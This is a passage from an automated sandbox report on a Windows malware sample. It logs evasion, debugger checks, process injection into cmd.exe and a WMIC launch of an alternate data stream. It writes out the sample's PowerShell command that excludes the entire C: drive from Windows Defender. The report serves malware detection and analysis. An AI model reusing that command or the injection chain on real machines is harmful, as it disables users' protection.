          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Found evasive API chain checking for user administrative privileges
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_0-21073
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-21650
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe TID: 6364Thread sleep count: 59 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6688Thread sleep time: -10145709240540247s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6672Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\ProgramData\images.exe TID: 6520Thread sleep count: 94 > 30Jump to behavior
          Source: C:\ProgramData\images.exe TID: 6520Thread sleep time: -75200s >= -30000sJump to behavior
          Source: C:\ProgramData\images.exe TID: 6704Thread sleep count: 59 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6380Thread sleep time: -14757395258967632s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2492Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\cmd.exe TID: 7112Thread sleep count: 853 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exe TID: 7112Thread sleep time: -10236000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,0_2_02D1DA5B
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4887Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1233Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4936
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 702
          Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 853Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-20874
          Source: C:\ProgramData\images.exeDropped PE file which has not been started: C:\Program Files\Microsoft DN1\sqlmap.dllJump to dropped file
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeFile opened / queried: scsi#disk&ven_vmware&prod_virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeFile opened: PHYSICALDRIVE0Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D2002B GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,0_2_02D2002B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeAPI call chain: ExitProcess graph end nodegraph_0-21246
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeAPI call chain: ExitProcess graph end nodegraph_0-19712
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeAPI call chain: ExitProcess graph end nodegraph_0-21068
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
          Source: powershell.exe, 00000001.00000003.378873631.0000000004BFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp, images.exe, 00000004.00000002.520447296.000000000054A000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: .?AVCRegistryVirtualMachine@ATL@@
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp, images.exe, 00000004.00000002.520447296.000000000054A000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: A.?AVCRegistryVirtualMachine@ATL@@l
          Source: powershell.exe, 00000001.00000003.378873631.0000000004BFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040AAE3 VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,0_2_0040AAE3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040FD34 FindFirstFileExA,0_2_0040FD34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040FE55 FindFirstFileExA,FindClose,0_2_0040FE55
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1FF27 FindFirstFileW,FindNextFileW,0_2_02D1FF27
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D19DF6 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,0_2_02D19DF6
          Source: C:\Windows\System32\drivers\tsusbhub.sysSystem information queried: ModuleInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00553B50 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00553B50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040FB09 mov eax, dword ptr fs:[00000030h]0_2_0040FB09
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040C40E mov eax, dword ptr fs:[00000030h]0_2_0040C40E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D2094E mov eax, dword ptr fs:[00000030h]0_2_02D2094E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D20619 mov eax, dword ptr fs:[00000030h]0_2_02D20619
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D20620 mov eax, dword ptr fs:[00000030h]0_2_02D20620
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0326001A mov eax, dword ptr fs:[00000030h]8_2_0326001A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00407269 IsDebuggerPresent,OutputDebugStringW,0_2_00407269
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040AAE3 VirtualProtect ?,-00000001,00000104,?,?,?,0000001C0_2_0040AAE3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00410931 GetProcessHeap,0_2_00410931
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\ProgramData\images.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00407F52 SetUnhandledExceptionFilter,0_2_00407F52
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_004079AA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004079AA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00407DBF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00407DBF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040A7A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A7A3

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Allocates memory in foreign processes
          Source: C:\ProgramData\images.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 3260000 protect: page execute and read and writeJump to behavior
          Source: C:\ProgramData\images.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 3280000 protect: page read and writeJump to behavior
          Creates a thread in another existing process (thread injection)
          Source: C:\ProgramData\images.exeThread created: C:\Windows\SysWOW64\cmd.exe EIP: 326010EJump to behavior
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
          Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
          Writes to foreign memory regions
          Source: C:\ProgramData\images.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 3260000Jump to behavior
          Source: C:\ProgramData\images.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 3280000Jump to behavior
          Contains functionality to inject threads in other processes
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D179E8 OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,0_2_02D179E8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D21FD8 RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,0_2_02D21FD8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe0_2_02D220B8
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create '"C:\ProgramData:ApplicationData"'Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1F56D AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid,0_2_02D1F56D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D218BA InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError,0_2_02D218BA
          Source: images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
          Source: images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
